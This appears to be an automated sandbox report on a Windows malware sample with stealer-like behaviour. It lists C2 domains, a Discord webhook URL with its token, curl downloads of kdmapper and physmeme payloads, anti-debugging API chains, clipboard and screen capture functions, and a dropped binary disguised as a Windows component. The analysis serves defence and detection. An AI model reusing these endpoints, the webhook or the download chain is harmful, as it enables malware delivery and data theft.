Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ww.youtube.com https://www.google.com https://sketchfab. equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: file.garden
Source: global traffic	DNS traffic detected: DNS query: tiddymarktwo.shop
Source: global traffic	DNS traffic detected: DNS query: surveriysiop.shop
Source: global traffic	DNS traffic detected: DNS query: captainynfanw.shop
Source: global traffic	DNS traffic detected: DNS query: tearrybyiwo.shop
Source: global traffic	DNS traffic detected: DNS query: appleboltelwk.shop
Source: global traffic	DNS traffic detected: DNS query: tendencerangej.shop
Source: global traffic	DNS traffic detected: DNS query: fossillargeiw.shop
Source: global traffic	DNS traffic detected: DNS query: coursedonnyre.shop
Source: global traffic	DNS traffic detected: DNS query: strappystyio.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: offeviablwke.site
Source: global traffic	DNS traffic detected: DNS query: zelensky.top

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site

Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000024.00000002.1852018210.000001AF6E530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000025.00000002.1820619216.00000194D5B2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000024.00000002.1860376856.000001AF6E6B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: msedge.exe, 0000002A.00000002.1821903588.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic(L
Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000025.00000002.1806078775.00000194D5928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://osoft.co
Source: powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000024.00000002.1852018210.000001AF6E530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000024.00000002.1569280985.000001AF00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1569280985.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD761000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000024.00000002.1569280985.000001AF00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: NCTSgL4t0B.exe	String found in binary or memory: http://www.houseindustries.com/license
Source: NCTSgL4t0B.exe	String found in binary or memory: http://www.houseindustries.com/licenseBurbank
Source: NCTSgL4t0B.exe	String found in binary or memory: http://www.houseindustries.com/licenseCopyright
Source: NCTSgL4t0B.exe	String found in binary or memory: http://www.houseindustries.comhttp://www.talleming.comHouse
Source: powershell.exe, 00000025.00000002.1820619216.00000194D5B2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top
Source: Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top/
Source: msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
Source: powershell.exe, 00000024.00000002.1569280985.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.c
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appleboltelwk.shop:443/api
Source: NCTSgL4t0B.exe	String found in binary or memory: https://auth.gg/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.c
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://coursedonnyre.shop:443/api
Source: NCTSgL4t0B.exe	String found in binary or memory: https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO
Source: curl.exe, 0000000A.00000002.1305246511.0000013FD8180000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305246511.0000013FD8189000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304872515.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304898793.0000013FD8193000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304965327.0000013FD8196000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304773710.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305291488.0000013FD8196000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305347033.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
Source: curl.exe, 0000000A.00000003.1304872515.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304773710.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305347033.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin$h
Source: curl.exe, 0000000A.00000002.1305246511.0000013FD8180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
Source: curl.exe, 0000000A.00000002.1305246511.0000013FD8189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin6&
Source: curl.exe, 0000000E.00000003.1325480427.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
Source: curl.exe, 0000000E.00000002.1325740592.000001EBAEA00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
Source: curl.exe, 0000000E.00000003.1325302112.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1325850619.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325227642.000001EBAEA39000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325480427.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binN
Source: curl.exe, 0000000E.00000003.1325345916.000001EBAEA13000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325527057.000001EBAEA16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binapi.dll
Source: curl.exe, 0000000E.00000002.1325740592.000001EBAEA08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binc/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fossillargeiw.shop:443/api
Source: powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.co
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/(
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/api
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/apiWL3
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/le
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/ty
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site:443/apip
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900(
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-Au
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.7:49706 version: TLS 1.2

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Code function: 0_2_00007FF735DB2A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memmove,free,GlobalUnlock,CloseClipboard,

0_2_00007FF735DB2A90

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Code function: 0_2_00007FF735DB2CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

0_2_00007FF735DB2CE0

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Code function: 0_2_00007FF735DB2A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memmove,free,GlobalUnlock,CloseClipboard,

0_2_00007FF735DB2A90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 19_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

19_2_00438E3C

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Code function: 0_2_00007FF735DDD840 pow,pow,pow,sqrt,_invalid_parameter_noinfo_noreturn,pow,pow,sqrt,memchr,memchr,memchr,memchr,memchr,memchr,memchr,memchr,SendInput,GetAsyncKeyState,_invalid_parameter_noinfo_noreturn,

0_2_00007FF735DDD840

System Summary

.NET source code contains very large array initializations

Source: physmeme.exe.14.dr, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 360448

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,	0_2_00007FF735DD4BF0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD4760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,	0_2_00007FF735DD4760
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD604D ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,	0_2_00007FF735DD604D

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Code function: 0_2_00007FF735DE8310: DeviceIoControl,

0_2_00007FF735DE8310

Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD4300	0_2_00007FF735DD4300
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD4BF0	0_2_00007FF735DD4BF0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD4760	0_2_00007FF735DD4760
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD2F10	0_2_00007FF735DD2F10
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DBA2F0	0_2_00007FF735DBA2F0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DEBAEC	0_2_00007FF735DEBAEC
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DB6ED0	0_2_00007FF735DB6ED0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD76D0	0_2_00007FF735DD76D0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DC7680	0_2_00007FF735DC7680
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DB0E80	0_2_00007FF735DB0E80
